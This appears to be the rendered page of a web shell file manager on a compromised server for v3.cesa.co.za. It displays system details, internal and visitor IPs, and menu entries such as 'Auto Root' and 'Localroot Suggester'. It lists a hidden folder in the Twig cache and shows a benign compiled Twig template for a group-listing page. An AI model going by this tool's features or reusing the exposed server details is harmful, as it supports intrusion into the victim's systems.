Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.216.28
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
v3.cesa.co.za /
var /
cache /
.!!QgY /
twig /
14 /
Delete
Unzip
Name
Size
Permission
Date
Action
.htaccess
237
B
-r-xr-xr-x
2026-08-17 03:12
142df4ac8c178fed9f4b291f383bc688.php
14.48
KB
-rwxrwxr-x
2026-05-18 12:54
14e2780e4f4f5994e848939508b32649.php
32.8
KB
-rwxrwxr-x
2026-05-18 12:54
Save
Rename
<?php use Twig\Environment; use Twig\Error\LoaderError; use Twig\Error\RuntimeError; use Twig\Extension\CoreExtension; use Twig\Extension\SandboxExtension; use Twig\Markup; use Twig\Sandbox\SecurityError; use Twig\Sandbox\SecurityNotAllowedTagError; use Twig\Sandbox\SecurityNotAllowedFilterError; use Twig\Sandbox\SecurityNotAllowedFunctionError; use Twig\Source; use Twig\Template; use Twig\TemplateWrapper; /* @User/UserGroup/list.html.twig */ class __TwigTemplate_1e37f7507b54a565b003dea241949d97 extends Template { private Source $source; /** * @var array<string, Template> */ private array $macros = []; public function __construct(Environment $env) { parent::__construct($env); $this->source = $this->getSourceContext(); $this->blocks = [ 'title' => [$this, 'block_title'], 'head_description' => [$this, 'block_head_description'], 'head_keyword' => [$this, 'block_head_keyword'], 'og_title' => [$this, 'block_og_title'], 'og_description' => [$this, 'block_og_description'], 'head_script' => [$this, 'block_head_script'], 'head_style' => [$this, 'block_head_style'], 'page_header_h1' => [$this, 'block_page_header_h1'], 'content' => [$this, 'block_content'], ]; } protected function doGetParent(array $context): bool|string|Template|TemplateWrapper { // line 1 return "base.html.twig"; } protected function doDisplay(array $context, array $blocks = []): iterable { $macros = $this->macros; $this->parent = $this->load("base.html.twig", 1); yield from $this->parent->unwrap()->yield($context, array_merge($this->blocks, $blocks)); } // line 3 /** * @return iterable<null|scalar|\Stringable> */ public function block_title(array $context, array $blocks = []): iterable { $macros = $this->macros; yield $this->env->getRuntime('Twig\Runtime\EscaperRuntime')->escape($this->extensions['App\CoreBundle\Twig\CoreExtension']->getPhrase("My Groups"), "html", null, true); yield from []; } // line 5 /** * @return iterable<null|scalar|\Stringable> */ public function block_head_description(array $context, array $blocks = []): iterable { $macros = $this->macros; yield $this->env->getRuntime('Twig\Runtime\EscaperRuntime')->escape($this->extensions['App\CoreBundle\Twig\CoreExtension']->getPhrase("Manage my groups"), "html", null, true); yield from []; } // line 6 /** * @return iterable<null|scalar|\Stringable> */ public function block_head_keyword(array $context, array $blocks = []): iterable { $macros = $this->macros; yield $this->env->getRuntime('Twig\Runtime\EscaperRuntime')->escape($this->extensions['App\CoreBundle\Twig\CoreExtension']->getPhrase("manage, groups"), "html", null, true); yield from []; } // line 8 /** * @return iterable<null|scalar|\Stringable> */ public function block_og_title(array $context, array $blocks = []): iterable { $macros = $this->macros; yield $this->env->getRuntime('Twig\Runtime\EscaperRuntime')->escape($this->extensions['App\CoreBundle\Twig\CoreExtension']->getPhrase("My Groups"), "html", null, true); yield from []; } // line 9 /** * @return iterable<null|scalar|\Stringable> */ public function block_og_description(array $context, array $blocks = []): iterable { $macros = $this->macros; yield $this->env->getRuntime('Twig\Runtime\EscaperRuntime')->escape($this->extensions['App\CoreBundle\Twig\CoreExtension']->getPhrase("Manage my groups"), "html", null, true); yield from []; } // line 11 /** * @return iterable<null|scalar|\Stringable> */ public function block_head_script(array $context, array $blocks = []): iterable { $macros = $this->macros; // line 12 yield " "; yield from $this->yieldParentBlock("head_script", $context, $blocks); yield " "; // line 13 yield $this->extensions['Symfony\WebpackEncoreBundle\Twig\EntryFilesTwigExtension']->renderWebpackScriptTags("content"); yield " "; // line 14 yield $this->extensions['Symfony\WebpackEncoreBundle\Twig\EntryFilesTwigExtension']->renderWebpackScriptTags("form"); yield " "; yield from []; } // line 17 /** * @return iterable<null|scalar|\Stringable> */ public function block_head_style(array $context, array $blocks = []): iterable { $macros = $this->macros; // line 18 yield " "; yield from $this->yieldParentBlock("head_style", $context, $blocks); yield " "; // line 19 yield $this->extensions['Symfony\WebpackEncoreBundle\Twig\EntryFilesTwigExtension']->renderWebpackLinkTags("content"); yield " "; // line 20 yield $this->extensions['Symfony\WebpackEncoreBundle\Twig\EntryFilesTwigExtension']->renderWebpackLinkTags("form"); yield " "; yield from []; } // line 23 /** * @return iterable<null|scalar|\Stringable> */ public function block_page_header_h1(array $context, array $blocks = []): iterable { $macros = $this->macros; // line 24 yield " "; yield $this->env->getRuntime('Twig\Runtime\EscaperRuntime')->escape($this->extensions['App\CoreBundle\Twig\CoreExtension']->getPhrase("My Groups"), "html", null, true); yield " "; yield from []; } // line 27 /** * @return iterable<null|scalar|\Stringable> */ public function block_content(array $context, array $blocks = []): iterable { $macros = $this->macros; // line 28 yield " <div class=\"pull-right\"> "; // line 30 yield from $this->load("@UserBundle/UserList/menu.html.twig", 30)->unwrap()->yield($context); // line 31 yield " </div> <div class=\"navigation\"> "; // line 34 yield $this->env->getRuntime('Knp\Bundle\PaginatorBundle\Twig\Extension\PaginationRuntime')->render($this->env, ($context["pagination"] ?? null)); yield " </div> <table class=\"table\"> <tr> <th> "; // line 39 yield $this->env->getRuntime('Knp\Bundle\PaginatorBundle\Twig\Extension\PaginationRuntime')->sortable($this->env, ($context["pagination"] ?? null), $this->extensions['App\CoreBundle\Twig\CoreExtension']->getPhrase("Name"), "ug.group_name"); yield " </th> <th> "; // line 42 yield $this->env->getRuntime('Knp\Bundle\PaginatorBundle\Twig\Extension\PaginationRuntime')->sortable($this->env, ($context["pagination"] ?? null), $this->extensions['App\CoreBundle\Twig\CoreExtension']->getPhrase("Created"), "ug.created_at"); yield " </th> <th>"; // line 44 yield $this->env->getRuntime('Twig\Runtime\EscaperRuntime')->escape($this->extensions['App\CoreBundle\Twig\CoreExtension']->getPhrase("Members"), "html", null, true); yield "</th> <th> "; // line 46 yield $this->env->getRuntime('Twig\Runtime\EscaperRuntime')->escape($this->extensions['App\CoreBundle\Twig\CoreExtension']->getPhrase("Actions"), "html", null, true); yield " <a class=\"btn btn-primary\" href=\""; // line 48 yield $this->env->getRuntime('Twig\Runtime\EscaperRuntime')->escape($this->extensions['Symfony\Bridge\Twig\Extension\RoutingExtension']->getPath("iga_user_group_edit", ["cultureString" => CoreExtension::getAttribute($this->env, $this->source, ($context["userLanguage"] ?? null), "cultureString", [], "any", false, false, false, 48)]), "html", null, true); yield "\" >"; // line 49 yield $this->env->getRuntime('Twig\Runtime\EscaperRuntime')->escape($this->extensions['App\CoreBundle\Twig\CoreExtension']->getPhrase("Add"), "html", null, true); yield "</a> </th> </tr> "; // line 52 $context['_parent'] = $context; $context['_seq'] = CoreExtension::ensureTraversable(($context["pagination"] ?? null)); $context['loop'] = [ 'parent' => $context['_parent'], 'index0' => 0, 'index' => 1, 'first' => true, ]; if (is_array($context['_seq']) || (is_object($context['_seq']) && $context['_seq'] instanceof \Countable)) { $length = count($context['_seq']); $context['loop']['revindex0'] = $length - 1; $context['loop']['revindex'] = $length; $context['loop']['length'] = $length; $context['loop']['last'] = 1 === $length; } foreach ($context['_seq'] as $context["_key"] => $context["userGroup"]) { // line 53 yield " <tr "; if ((CoreExtension::getAttribute($this->env, $this->source, $context["loop"], "index", [], "any", false, false, false, 53) % 2 != 0)) { yield " class=\"odd-row\""; } yield "> <td>"; // line 54 yield $this->env->getRuntime('Twig\Runtime\EscaperRuntime')->escape(CoreExtension::getAttribute($this->env, $this->source, $context["userGroup"], "groupName", [], "method", false, false, false, 54), "html", null, true); yield "</td> <td>"; // line 55 yield $this->env->getRuntime('Twig\Runtime\EscaperRuntime')->escape(CoreExtension::getAttribute($this->env, $this->source, CoreExtension::getAttribute($this->env, $this->source, $context["userGroup"], "createdAt", [], "any", false, false, false, 55), "format", ["j F Y H:i"], "method", false, false, false, 55), "html", null, true); yield "</td> <td>"; // line 56 yield $this->env->getRuntime('Twig\Runtime\EscaperRuntime')->escape(Twig\Extension\CoreExtension::length($this->env->getCharset(), CoreExtension::getAttribute($this->env, $this->source, $context["userGroup"], "userList", [], "any", false, false, false, 56)), "html", null, true); yield "</td> <td> <div class=\"btn-group\"> <a class=\"btn btn-primary\" href=\""; // line 60 yield $this->env->getRuntime('Twig\Runtime\EscaperRuntime')->escape($this->extensions['Symfony\Bridge\Twig\Extension\RoutingExtension']->getPath("iga_user_group_edit", ["cultureString" => CoreExtension::getAttribute($this->env, $this->source, ($context["userLanguage"] ?? null), "cultureString", [], "any", false, false, false, 60), "userGroupId" => CoreExtension::getAttribute($this->env, $this->source, $context["userGroup"], "id", [], "any", false, false, false, 60)]), "html", null, true); yield "\" >"; // line 61 yield $this->env->getRuntime('Twig\Runtime\EscaperRuntime')->escape($this->extensions['App\CoreBundle\Twig\CoreExtension']->getPhrase("Edit"), "html", null, true); yield "</a> <a class=\"btn btn-primary\" href=\""; // line 63 yield $this->env->getRuntime('Twig\Runtime\EscaperRuntime')->escape($this->extensions['Symfony\Bridge\Twig\Extension\RoutingExtension']->getPath("iga_user_group_list", ["cultureString" => CoreExtension::getAttribute($this->env, $this->source, ($context["userLanguage"] ?? null), "cultureString", [], "any", false, false, false, 63), "deleteUserGroupId" => CoreExtension::getAttribute($this->env, $this->source, $context["userGroup"], "id", [], "any", false, false, false, 63)]), "html", null, true); yield "\" onclick=\"return confirm('"; yield $this->env->getRuntime('Twig\Runtime\EscaperRuntime')->escape($this->extensions['App\CoreBundle\Twig\CoreExtension']->getPhrase("Are you sure you want to delete this group? This action can not be undone. Contacts linked to the group will not be deleted."), "html", null, true); yield "');\" >"; // line 64 yield $this->env->getRuntime('Twig\Runtime\EscaperRuntime')->escape($this->extensions['App\CoreBundle\Twig\CoreExtension']->getPhrase("Delete"), "html", null, true); yield "</a> </div> </td> </tr> "; ++$context['loop']['index0']; ++$context['loop']['index']; $context['loop']['first'] = false; if (isset($context['loop']['revindex0'], $context['loop']['revindex'])) { --$context['loop']['revindex0']; --$context['loop']['revindex']; $context['loop']['last'] = 0 === $context['loop']['revindex0']; } } $_parent = $context['_parent']; unset($context['_seq'], $context['_key'], $context['userGroup'], $context['_parent'], $context['loop']); $context = array_intersect_key($context, $_parent) + $_parent; // line 69 yield " </table> <div class=\"navigation\"> "; // line 71 yield $this->env->getRuntime('Knp\Bundle\PaginatorBundle\Twig\Extension\PaginationRuntime')->render($this->env, ($context["pagination"] ?? null)); yield " </div> "; yield from []; } /** * @codeCoverageIgnore */ public function getTemplateName(): string { return "@User/UserGroup/list.html.twig"; } /** * @codeCoverageIgnore */ public function isTraitable(): bool { return false; } /** * @codeCoverageIgnore */ public function getDebugInfo(): array { return array ( 309 => 71, 305 => 69, 286 => 64, 280 => 63, 275 => 61, 271 => 60, 264 => 56, 260 => 55, 256 => 54, 249 => 53, 232 => 52, 226 => 49, 222 => 48, 217 => 46, 212 => 44, 207 => 42, 201 => 39, 193 => 34, 188 => 31, 186 => 30, 182 => 28, 175 => 27, 167 => 24, 160 => 23, 153 => 20, 149 => 19, 144 => 18, 137 => 17, 130 => 14, 126 => 13, 121 => 12, 114 => 11, 103 => 9, 92 => 8, 81 => 6, 70 => 5, 59 => 3, 48 => 1,); } public function getSourceContext(): Source { return new Source("", "@User/UserGroup/list.html.twig", "/var/www/v3.cesa.co.za/src/UserBundle/Resources/views/UserGroup/list.html.twig"); } }